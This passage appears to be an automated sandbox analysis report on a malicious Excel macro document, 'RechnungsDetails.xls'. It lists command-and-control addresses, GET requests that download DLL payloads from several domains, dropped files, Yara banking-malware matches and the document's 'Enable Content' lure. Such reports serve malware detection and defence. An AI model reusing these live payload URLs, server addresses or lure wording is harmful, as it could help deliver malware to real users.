                      Source: regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                      Source: regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/0
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/J
                      Source: regsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/N
                      Source: regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: www.melisetotoaksesuar.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                      Source: global trafficHTTP traffic detected: GET /catalog/controller/account/dqfKI/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.melisetotoaksesuar.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /athletics-carnival-2018/3UTZYr9D9f/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: elamurray.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /aaabackupsqldb/11hYk3bHJ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jr-software-web.netConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 212.98.224.29:443 -> 192.168.2.22:49173 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1264915905.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1264216924.00000000003F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1346182348.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1056224873.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926879685.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1055136020.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1347157002.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1346169156.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1347032948.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Source: RechnungsDetails.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: RechnungsDetails.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Source: RechnungsDetails.xlsInitial sample: EXEC
                      Source: RechnungsDetails.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\FIdWcB\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_001C00003_2_001C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C743_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE83_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800201183_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C3_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C3_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196283_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A4C3_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B7B23_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800094083_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C143_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064143_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C3_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8343_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C3_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800214443_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800120443_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160543_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C3_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018703_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F8783_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800144843_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154943_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC983_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C3_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A43_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A83_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC3_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B03_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB43_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B43_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C03_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C03_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C83_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D43_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D83_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F03_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125003_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800241043_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C3_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D103_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A5243_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D283_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E1303_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800291343_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800081343_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800221403_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800069543_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F5543_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B5643_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121683_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135683_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800245703_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800191783_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800251803_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800019803_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215883_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A9883_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181903_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800139943_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800289983_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A03_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A63_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA83_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC3_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B43_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B83_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B83_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC3_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C03_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C83_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC3_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D43_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D83_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E03_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC3_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800236243_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800186283_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C3_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176383_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C3_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E403_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A643_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800152643_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C3_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076783_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C3_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126803_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E883_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C3_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800222903_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A903_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C3_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA03_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC3_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB43_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC3_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C03_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC83_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC3_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC3_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC3_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F43_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF43_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF43_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC3_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063083_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C3_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B183_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F243_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B243_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F3283_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217383_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF383_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283483_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C3_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F503_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B3503_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A7583_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C3_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243703_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083703_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157743_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800123783_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B983_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C3_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA03_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A43_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC3_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B03_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB83_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC3_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC03_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC3_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC3_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001300004_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C8194_2_000000018000C819
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800196284_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C4_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C4_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800128644_2_0000000180012864
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C744_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B04_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800090B44_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C04_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C04_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800241044_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B244_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A7584_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800245704_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C4_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A44_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC4_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800094084_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C144_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064144_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800236244_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800186284_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C4_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C4_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B8344_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800176384_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C4_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004E3C4_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020E404_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800214444_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800120444_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160544_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015A644_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800152644_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A26C4_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800018704_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F8784_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076784_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001667C4_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126804_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800144844_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001E884_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000968C4_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800222904_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A904_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154944_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC984_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000529C4_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008C9C4_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020AA04_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800078A44_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F0A84_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022AAC4_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E4AC4_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800048B04_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ACB44_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007EB44_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800162BC4_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800270C04_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800280C84_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001AEC84_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800050D44_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800234D84_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F6DC4_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800026DC4_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002ADC4_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002ACE84_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800150F04_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E2F44_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016AF44_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DEF44_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DEFC4_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800125004_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800063084_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001370C4_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C4_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D104_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800201184_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B184_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A5244_2_000000018001A524
